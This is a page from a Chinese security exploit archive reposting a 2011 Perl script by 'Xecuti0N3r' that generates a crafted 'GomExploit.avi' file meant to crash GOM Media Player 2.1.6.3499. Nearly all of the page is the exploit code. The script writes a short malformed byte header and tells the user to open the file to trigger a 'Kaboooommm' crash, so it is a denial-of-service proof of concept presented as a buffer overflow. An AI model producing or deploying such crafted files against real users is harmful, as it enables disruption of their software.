首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
GOM Media Player 2.1.6.3499 0Day Buffer overflow/DOS Exploit
来源:xecuti0n3r@yahoo.com 作者:Xecuti0N3r 发布时间:2011-04-02  

#!/usr/bin/perl
#(+)Exploit Title: GOM Media Player 2.1.6.3499 0day Buffer overflow/DOS Exploit
#(+)Software Link: download.cnet.com/GOM-Media-Player/3000-2139_4-10701768.html
#(+)Software  : GOM Media Player
#(+)Version   : 2.1.6.3499
#(+)Tested On : WIN-XP SP3
#(+) Date     : 31.03.2011
#(+) Hour     : 3:37 PM
#Similar Bug was found by cr4wl3r in MediaPlayer Classic

system("color 6");
system("title GOM Media Player 2.1.6.3499 0day Buffer overflow/DOS Exploit");
print "
_______________________________________________________________________
                 
(+)Exploit Title: GOM Media Player 2.1.6.3499 0day Buffer overflow/DOS Exploit
 
(+) Software Link: download.cnet.com/GOM-Media-Player/3000-2139_4-10701768.html     
(+) Software  : GOM Media Player
(+) Version   : 2.1.6.3499            
(+) Tested On : WIN-XP SP3            
(+) Date      : 31.03.2011            
(+) Hour      : 13:37 PM             
____________________________________________________________________\n ";
sleep 2;
system("cls");
system("color 2");
print "\nGenerating the exploit file !!!";
sleep 2;
print "\n\nGomExploit.avi file generated!!";
sleep 2;
$theoverflow = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";
 
open(file, "> GomExploit.avi");
print (file $theoverflow);
print "\n\n(+) Done!\n
(+) Now Just open GomExplot.avi with Gom Player and Kaboooommm !! ;) \n
(+) Most of the times there is a crash\n whenever you open the folder where the GomExploit.avi is stored :D \n";

sleep 3;
system("cls");
sleep 1;
system("color C");
print "\n\n\n########################################################################\n
(+)Exploit Coded by: ^Xecuti0N3r\n
(+)^Xecuti0N3r: E-mail \n
(+)d3M0l!tioN3r: E-mail \n
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r & aNnIh!LatioN3r \n
########################################################################\n\n";
system("pause");


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Real player 14.0.2.633 0day Bu
·IPComp encapsulation pre-auth
·Word List Builder Buffer Overf
·Windows Media Player 11.0.5721
·Movie Player 4.82 Denial Of Se
·HT Editor File openning Stack
·RealNetworks RealGames StubbyU
·Zend Java Bridge - Remote Code
·RealNetworks RealGames StubbyU
·Pligg CMS 1.1.3 Multiple Vulne
·Encore ENPS-2012 Cross-site Sc
·Media Player Classic Home Cine
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved